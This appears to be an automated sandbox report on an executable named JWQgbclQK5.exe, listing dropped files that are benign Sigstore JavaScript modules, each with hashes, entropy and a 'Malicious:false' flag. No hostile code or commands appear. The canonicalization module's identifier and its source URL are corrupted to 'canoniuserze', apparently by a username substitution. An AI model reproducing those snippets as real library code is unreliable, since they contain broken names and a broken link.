              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.FulcioSigner = exports.DEFAULT_FULCIO_URL = void 0;./*.Copyright 2023 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.const error_1 = require("../../error");.const util_1 = require("../../util");.const ca_1 = require("./ca");.const ephemeral_1 = require("./ephemeral");.exports.DEFAULT_FULCIO_URL = 'https://fulcio.sigstore.dev';.// Signer implementation which can be used to decorate another signer.// with a Ful
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):997
              Entropy (8bit):5.158722892137013
              Encrypted:false
              SSDEEP:
              MD5:54AC9702F63D78F6251C26395CF03546
              SHA1:8B9F9A20150F08A22766DFC76AB3699DD2B95826
              SHA-256:37FE81E0A09F2B339B9196AE2C80DAF1AC7355AC4EE25468753E41DBDB82BC00
              SHA-512:81108B85BBECA0436CDD0307AB8C94E29176EB45D991C2864CAA0DF59DD781870944935AEBF1D95B2D756CF713D363EAEF34D16E746CD91BE34B202F69F5B037
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.FulcioSigner = exports.DEFAULT_FULCIO_URL = void 0;./*.Copyright 2023 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.var fulcio_1 = require("./fulcio");.Object.defineProperty(exports, "DEFAULT_FULCIO_URL", { enumerable: true, get: function () { return fulcio_1.DEFAULT_FULCIO_URL; } });.Object.defineProperty(exports, "FulcioSigner", { enumerable: true, get: function () { return fulcio_1.FulcioSigner; } });.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):645
              Entropy (8bit):4.973058062476686
              Encrypted:false
              SSDEEP:
              MD5:C95686DAA97AB29E0B88E55D94924DBD
              SHA1:0AB702D6E4DC23CF17C77C0B1960090D91FC9B4C
              SHA-256:FD8AECE4BC1044E0324B98B6A525084CD19DC16960B91DCFC28633F94D64FD7E
              SHA-512:0432A8F0F40DBACF232F3FB00983846FFAB8A5AE260F78419CF6126C1F4FA8F31837663CA32D7FD659E3027CEBD8354047100DDEA7EB127130840086CD38291F
              Malicious:false
              Reputation:unknown
              Preview:"use strict";./*.Copyright 2023 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.Object.defineProperty(exports, "__esModule", { value: true });.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):77
              Entropy (8bit):4.67453512596597
              Encrypted:false
              SSDEEP:
              MD5:8963201168A2449F79025884824955F2
              SHA1:B66EDAE489B6E4147CE7E1EC65A107E297219771
              SHA-256:D43AA81F5BC89FAA359E0F97C814BA25155591FF078FBB9BFD40F8C7C9683230
              SHA-512:7F65C6403A23D93FB148E8259B012D6552AB3BFF178F4A7D6A9D9CEC0F60429FC1899E39B4BCA8CC08AFC75D9A7C7BFDB13FC372CA63C85EB22B0355EB4D6000
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1043
              Entropy (8bit):5.172236037817138
              Encrypted:false
              SSDEEP:
              MD5:EA221803FF0EA63008E76666203A07B1
              SHA1:B98C818BFF6B68FD704408E386097C339B0D62EC
              SHA-256:062A89FD85EA239B5AAF237BE725EC87733D88BF64BB12A96BEB7317CE420E40
              SHA-512:B5C38C839A80A902520CE088045D5A7F6A7D9F9AAB5ED1FAF3C4570088BC5667B18FFA4CF3E015E3261269662EA2A71AD5CAE0830C9371E1029BAC97C6C0418A
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __importDefault = (this && this.__importDefault) || function (mod) {. return (mod && mod.__esModule) ? mod : { "default": mod };.};.Object.defineProperty(exports, "__esModule", { value: true });.exports.hash = void 0;./*.Copyright 2023 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.const crypto_1 = __importDefault(require("crypto"));.const SHA256_ALGORITHM = 'sha256';.function hash(data, algorithm = SHA256_ALGORITHM) {. return crypto_1.default.createHash(algorithm).upd
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):997
              Entropy (8bit):5.1651384174816695
              Encrypted:false
              SSDEEP:
              MD5:6590A888C4AFEC94EA28398443A5D6E6
              SHA1:974E2C22D3256722AF5E8B912F5182535EEF1CBB
              SHA-256:DD82FC8943BA1C472B91FCFBE46919CFB103C7988F85EE68F75ABF85A8DB529C
              SHA-512:B6B3E6D0B542381D1DF62877B413612EF5EC62F477A90C065BDA962D1315DE1E3E8C06E87B45884815875F9B7E5ABCBDE1FC09E1F08D27AB5E62FFA4EF7D88EE
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.preAuthEncoding = void 0;./*.Copyright 2023 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.const PAE_PREFIX = 'DSSEv1';.// DSSE Pre-Authentication Encoding.function preAuthEncoding(payloadType, payload) {. const prefix = Buffer.from(`${PAE_PREFIX} ${payloadType.length} ${payloadType} ${payload.length} `, 'ascii');. return Buffer.concat([prefix, payload]);.}.exports.preAuthEncoding = preAuthEncoding;.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1040
              Entropy (8bit):5.238336483242936
              Encrypted:false
              SSDEEP:
              MD5:72F5468812F2823D83AF83DED9733C2A
              SHA1:39C5CFD6077BCF042DDA2C01861135AB4F343AB0
              SHA-256:30B256E08414A27B7068711302FD08EB2221ECA1900F11764B91F10E49CF8705
              SHA-512:222F62F21EFD4205B9182A0814DAB545F96EED6684904CA5975E129F42355E064D7CF4E107E13E3FB55B8344BBA64C9332FDEEE4B9A4FC62669428DF748C37C0
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.base64Decode = exports.base64Encode = void 0;./*.Copyright 2023 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.const BASE64_ENCODING = 'base64';.const UTF8_ENCODING = 'utf-8';.function base64Encode(str) {. return Buffer.from(str, UTF8_ENCODING).toString(BASE64_ENCODING);.}.exports.base64Encode = base64Encode;.function base64Decode(str) {. return Buffer.from(str, BASE64_ENCODING).toString(UTF8_ENCODING);
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2130
              Entropy (8bit):5.080606315425625
              Encrypted:false
              SSDEEP:
              MD5:89E960A96E4271D3D72000681B7DE779
              SHA1:4771772A6323EA00AC015D8CE698CCEE64EFED5A
              SHA-256:79C55A8D7F92A26389942AE679B3EDB16A4DCB8457DE638096A06627907273D2
              SHA-512:5135B4B77A5CE6F04E3E3134974F4B922D5F031110E4A6CF4513A60113E29A5235513205732300DD905D030F6C1CCB7C3F6D711F5D5F0031245D96853593CC34
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) {. if (k2 === undefined) k2 = k;. var desc = Object.getOwnPropertyDescriptor(m, k);. if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) {. desc = { enumerable: true, get: function() { return m[k]; } };. }. Object.defineProperty(o, k2, desc);.}) : (function(o, m, k, k2) {. if (k2 === undefined) k2 = k;. o[k2] = m[k];.}));.var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) {. Object.defineProperty(o, "default", { enumerable: true, value: v });.}) : function(o, v) {. o["default"] = v;.});.var __importStar = (this && this.__importStar) || function (mod) {. if (mod && mod.__esModule) return mod;. var result = {};. if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k);. __setModuleDef
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1984
              Entropy (8bit):4.659184359886284
              Encrypted:false
              SSDEEP:
              MD5:B15D152FF80150E679CEE7F441091B36
              SHA1:02A44A2B9CD6C19B1AF7CDD0B7043747CDBA72F0
              SHA-256:CB3ADB661FD056E40C147D0036E854DD742630A61935810CE03F9E5BA2CE2AFE
              SHA-512:7203E1A533676F6D0EFB1DF990AD4FE012E5A1B71FF6AA4B9CA3B7B9F9C497B7DB8EDF002F00B38C31CAE5CA288A3AF3BD5428A194B2A8ADA616955078CF4233
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.canoniuserze = void 0;./*.Copyright 2023 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.// JSON canoniuserzation per https://github.com/cyberphone/json-canoniuserzation.// eslint-disable-next-line @typescript-eslint/no-explicit-any.function canoniuserze(object) {. let buffer = '';. if (object === null || typeof object !== 'object' || object.toJSON != null) {. // Primitives or toJSONable objects.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2146
              Entropy (8bit):5.074581926676992
              Encrypted:false
              SSDEEP:
              MD5:C8462565F2EAF27F3C04D2AD1B1585D9
              SHA1:D2672675654B0DCC84771E23498511AAD7BFDBB5
              SHA-256:9B83928F5BB5ED0FF2DBFCE3041BAB358971D7259BC9F6759D791FA7EAC6837B
              SHA-512:AD5F0A7079CA45C08D4855EF674C034798630297C316F8443998CF47CBAAAAE41671E5C0A07EEB7F262D4CFC5B1090C557BAB5ABAB4DB6B4908A04DD2FBE8B7B
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) {. if (k2 === undefined) k2 = k;. var desc = Object.getOwnPropertyDescriptor(m, k);. if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) {. desc = { enumerable: true, get: function() { return m[k]; } };. }. Object.defineProperty(o, k2, desc);.}) : (function(o, m, k, k2) {. if (k2 === undefined) k2 = k;. o[k2] = m[k];.}));.var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) {. Object.defineProperty(o, "default", { enumerable: true, value: v });.}) : function(o, v) {. o["default"] = v;.});.var __importStar = (this && this.__importStar) || function (mod) {. if (mod && mod.__esModule) return mod;. var result = {};. if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k);. __setModuleDef
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):995
              Entropy (8bit):5.199248524060959
              Encrypted:false
              SSDEEP:
              MD5:634E33D2BD3582721F2AF59DB0BF9D2D
              SHA1:7F765FD51F6DACD2306E2DA4B7E7A7B8FB849F75
              SHA-256:36B40FAB54056B35D2623E48D5EF4E891C99FF3AD6DF5C678EF06253B82DABF5
              SHA-512:3F07862C89ADC3E891518C45DE49B466B2BB6D5AFD8C13C28D69E9BA5984B46500F8A1BFC0E8946E4ECD10228643B04757CBE08FB480C797B8EB4A07B737FB67
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.toDER = void 0;./*.Copyright 2023 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.const PEM_HEADER = /-----BEGIN (.*)-----/;.const PEM_FOOTER = /-----END (.*)-----/;.function toDER(certificate) {. const lines = certificate. .split('\n'). .map((line) => line.match(PEM_HEADER) || line.match(PEM_FOOTER) ? '' : line);. return Buffer.from(lines.join(''), 'base64');.}.exports.toDER = toDER;.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1436
              Entropy (8bit):5.138662794868721
              Encrypted:false
              SSDEEP:
              MD5:E92C9A54026BC78CF4BE3CC9997FA42D
              SHA1:106D8BE45935D7BB38CA6CFD16F3947DF0B80F6C
              SHA-256:4ACC489543A8D4BAD0CD6A7BA6E9D02B4CAAEBFA8F72B73784A86114C47FA886
              SHA-512:2223A82F021D0FBE79A875B4D8E20A3B1784BF05C412EB62737745128C3DD77339E7810827373548A65DA7E7C13BB87A0F963E6FF7DE88248D7867380D7DFADB
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __importDefault = (this && this.__importDefault) || function (mod) {. return (mod && mod.__esModule) ? mod : { "default": mod };.};.Object.defineProperty(exports, "__esModule", { value: true });.exports.getUserAgent = void 0;./*.Copyright 2023 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.const os_1 = __importDefault(require("os"));.// Format User-Agent: <product> / <product-version> (<platform>).// source: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/User-A
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1152
              Entropy (8bit):5.159526672278384
              Encrypted:false
              SSDEEP:
              MD5:0728581D3577AEE576BBDE9CC4A59EA0
              SHA1:757230D82FA25A1CEFB75098EDA215EE67A55584
              SHA-256:8892F7721A935600A3867382BC3853DD909E72E8499F4A4E8720D0C88F9E0091
              SHA-512:89A481811A8BA59BD0238480A256C98A6B6B0523ED397548FD31F54AC89AE9764008C6BF0A53346AAF81E55C7685B85BD0F3C7E49B70B2407F1539B69881324E
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.TSAWitness = exports.RekorWitness = exports.DEFAULT_REKOR_URL = void 0;./*.Copyright 2023 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.var tlog_1 = require("./tlog");.Object.defineProperty(exports, "DEFAULT_REKOR_URL", { enumerable: true, get: function () { return tlog_1.DEFAULT_REKOR_URL; } });.Object.defineProperty(exports, "RekorWitness", { enumerable: true, get: function () { return tlog_1.RekorWitness;
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):2230
              Entropy (8bit):4.666841536645375
              Encrypted:false
              SSDEEP:
              MD5:E76FE23F5C9FB5E5113A5AF7DA98B598
              SHA1:9D306647A9053996A0032715CE2E33156D1F5BEC
              SHA-256:6F547BD619D7E84075580E1610AF9C55CBEEB122BC29332E1E215D9D4EDBAAD0
              SHA-512:F79A6D414B25365E6FCB8B9734D55F6DBE19D130D97D63B5717B5F746DDE070472C32F3E739F93206DDBED05F131166880DDFFCE4BE31A3A2772B5D6BFCE7F04
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.TLogClient = void 0;./*.Copyright 2023 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.const error_1 = require("../../error");.const error_2 = require("../../external/error");.const rekor_1 = require("../../external/rekor");.class TLogClient {. constructor(options) {. this.fetchOnConflict = options.fetchOnConflict ?? false;. this.rekor = new rekor_1.Rekor({. baseURL: options.rekorBa
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):5479
              Entropy (8bit):4.726801602792354
              Encrypted:false
              SSDEEP:
              MD5:2C976F04754DB7EE762F68AA446DDF05
              SHA1:2A61EED90B465FF6F04E3D22B133C50CD93E28DB
              SHA-256:2D7885DE01525301453492E9B4F84C2CFEA821B925310E50677572BF99175EA6
              SHA-512:8EEB157D3FE8F0A2AA9C8A45A459F8533EAE46BEF11087DAB554F066AF7592597A074CC0617B1EE42F4F652225C547CCEC0AFAAFFFB67840B119D3EBDDE4B1CC
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.toProposedEntry = void 0;./*.Copyright 2023 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.const bundle_1 = require("@sigstore/bundle");.const util_1 = require("../../util");.function toProposedEntry(content, publicKey, .// TODO: Remove this parameter once have completely switched to 'dsse' entries.entryType = 'intoto') {. switch (content.$case) {. case 'dsseEnvelope':. // TODO: Remove th
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):2879
              Entropy (8bit):4.900113964016073
              Encrypted:false
              SSDEEP:
              MD5:70E8DBC99987977509380648BF10DF69
              SHA1:47A89D02E51C9F33AF9D6D525A2474E53A3500FC
              SHA-256:BD5B45600371BA7DED4D28B790C840AD83A874183C10CCE6C28DF2175EADE23C
              SHA-512:B9DC5B4D1DED0101236A577E7005F1DDE807DF44AFE8621DC5A13A5DFDD6B16341BE8FB7A874FB8E9AE193FEDAA9804D38975C1D45EC5A42E999A3A8E7A8188C
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.RekorWitness = exports.DEFAULT_REKOR_URL = void 0;./*.Copyright 2023 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.const util_1 = require("../../util");.const client_1 = require("./client");.const entry_1 = require("./entry");.exports.DEFAULT_REKOR_URL = 'https://rekor.sigstore.dev';.class RekorWitness {. constructor(options) {. this.tlog = new client_1.TLogClient({. ...options,.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):1469
              Entropy (8bit):4.871036565105967
              Encrypted:false
              SSDEEP:
              MD5:8EEB94E7D6A9BFBE61BC380D1A41C509
              SHA1:B48BC613B3C7D86240B68F5FD3A00F858C00CA1C
              SHA-256:D1E11314EDFF7EA24B1A5FF4422CA1F69BF745B1322AABB98384A200E834EDE2
              SHA-512:59A86E4750C02EB95546EFA3005374A789F264A8A2284E2AA76ED002B846F88F19707FC28A86173D866960A41ECB8B133C8CFE6D158265F7D9FCE192A6247EE5
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.TSAClient = void 0;./*.Copyright 2023 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.const error_1 = require("../../error");.const tsa_1 = require("../../external/tsa");.const util_1 = require("../../util");.class TSAClient {. constructor(options) {. this.tsa = new tsa_1.TimestampAuthority({. baseURL: options.tsaBaseURL,. retry: options.retry,. timeout: options.timeo
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):1471
              Entropy (8bit):4.771685389214144
              Encrypted:false
              SSDEEP:
              MD5:513FE5B779D8DE96455CD6117AFBD619
              SHA1:78D2DE0EC4ABFDB64C7AD3F0B387D3AACE7C7CE5
              SHA-256:AD48014E42815DE0D9096046E7257CB13741B790DFE0ACFEABABB457C7D77D7D
              SHA-512:90C11EA1BFB9FFAAE4B12F09147F99C576EB8FE5741E60EF12C5CF4DE9E076C4B753A03FE7A293413102407ADAB4CEACF9DB52C94F618A2282BB1DE51BB178BA
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.TSAWitness = void 0;./*.Copyright 2023 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.const client_1 = require("./client");.class TSAWitness {. constructor(options) {. this.tsa = new client_1.TSAClient({. tsaBaseURL: options.tsaBaseURL,. retry: options.retry,. timeout: options.timeout,. });. }. async testify(content) {. const signature = extractSi
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1040
              Entropy (8bit):4.739518025856487
              Encrypted:false
              SSDEEP:
              MD5:AF1A993E83D81B89C2A405BC24AE48E5
              SHA1:41777CDC7B7E44EA4450C11506B2C8E4443E2839
              SHA-256:213D4AF51C49E71AA4553DB32A62F1B6E161EC8514042BD847608A1AA34BE045
              SHA-512:11CBEB69FE9B14961143DB479AA4D921045D33F751F774533428027E3B8540BAE582FFE338FA7D336B33E0BD22F61480C1FCBEA82A1CC65424BDAF6E474DBFB5
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "@sigstore/sign",. "version": "2.1.0",. "description": "Sigstore signing library",. "main": "dist/index.js",. "types": "dist/index.d.ts",. "scripts": {. "clean": "shx rm -rf dist *.tsbuildinfo",. "build": "tsc --build",. "test": "jest". },. "files": [. "dist". ],. "author": "bdehamer@github.com",. "license": "Apache-2.0",. "repository": {. "type": "git",. "url": "git+https://github.com/sigstore/sigstore-js.git". },. "bugs": {. "url": "https://github.com/sigstore/sigstore-js/issues". },. "homepage": "https://github.com/sigstore/sigstore-js/tree/main/packages/sign#readme",. "publishConfig": {. "provenance": true. },. "devDependencies": {. "@sigstore/jest": "^0.0.0",. "@sigstore/mock": "^0.4.0",. "@sigstore/rekor-types": "^2.0.0",. "@types/make-fetch-happen": "^10.0.0". },. "dependencies": {. "@sigstore/bundle": "^2.1.0",. "@sigstore/protobuf-specs": "^0.2.1",. "make-fetch-happen": "^13.0.0". },. "engines": {.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1756
              Entropy (8bit):4.952897696272643
              Encrypted:false
              SSDEEP:
              MD5:7E450CD9633B5CC591E9CFE5EE31501C
              SHA1:180EB8ADDA080DF41F1382740EEF2C639AF49BF2
              SHA-256:2BD9AE1C0BFAFECED87C7E180DCF5257F5505DC37AC09B506A098B28A9784DAE
              SHA-512:9CE7908E6D7F60183576A8854A2831D0C74C8D75F90AC71661691BDAB00162CC5B7AA2063993D93E6662FD9D05227F8E32D0340CA3376301AE61A7CA8D32A84C
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __importDefault = (this && this.__importDefault) || function (mod) {. return (mod && mod.__esModule) ? mod : { "default": mod };.};.Object.defineProperty(exports, "__esModule", { value: true });.exports.appDataPath = void 0;./*.Copyright 2023 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.const os_1 = __importDefault(require("os"));.const path_1 = __importDefault(require("path"));.function appDataPath(name) {. const homedir = os_1.default.homedir();. switch (process
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):3410
              Entropy (8bit):4.908601856983331
              Encrypted:false
              SSDEEP:
              MD5:269D605DA32D61B6F518723CF86AD013
              SHA1:3123087FFF0CF573986F72C3003E9173F0CE2013
              SHA-256:0AE19E989D2C6F291753E66FE88B77A320D4D283BFD9C1D102384C1B63750AC3
              SHA-512:8381E6A259217985307ECD5DE3EAD089FD2F5F6BD02403D61E046798E3C42A43FC7DD732D28A5DA15381040456EECFB734AF85D81E43EF6D2DA61575BD71E599
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __importDefault = (this && this.__importDefault) || function (mod) {. return (mod && mod.__esModule) ? mod : { "default": mod };.};.Object.defineProperty(exports, "__esModule", { value: true });.exports.TUFClient = void 0;./*.Copyright 2023 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.const fs_1 = __importDefault(require("fs"));.const path_1 = __importDefault(require("path"));.const tuf_js_1 = require("tuf-js");.const target_1 = require("./target");.class TUFClient {.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):338
              Entropy (8bit):4.558656889138021
              Encrypted:false
              SSDEEP:
              MD5:16B8D4196876B26E0D06AF0F20C0E401
              SHA1:07E654465F5547403C1440E5D24B6390F274C0D4
              SHA-256:E16C8271F369436D70C0292146EEE60142D92EF3B25BA2809AF36608DD7E2132
              SHA-512:B968DEF62EE03066FB33FE1B207A77207E9BE31D94D7FCDC336FF9E1E980905D894BAEF4D1B436F26B03D9C44AB83D2A348B36E0F18BB41E5575C6640909ACB0
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.TUFError = void 0;.class TUFError extends Error {. constructor({ code, message, cause, }) {. super(message);. this.code = code;. this.cause = cause;. this.name = this.constructor.name;. }.}.exports.TUFError = TUFError;.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2265
              Entropy (8bit):5.183618267728683
              Encrypted:false
              SSDEEP:
              MD5:27708B26015F46AC1C03F7275834BCA0
              SHA1:6DCA90D332CE9F14FD5855A36C769B12AA39C50D
              SHA-256:BCF7202537DB835A813F9314BC2B54E236A96A9CC120352D6C8A2239ABA22B28
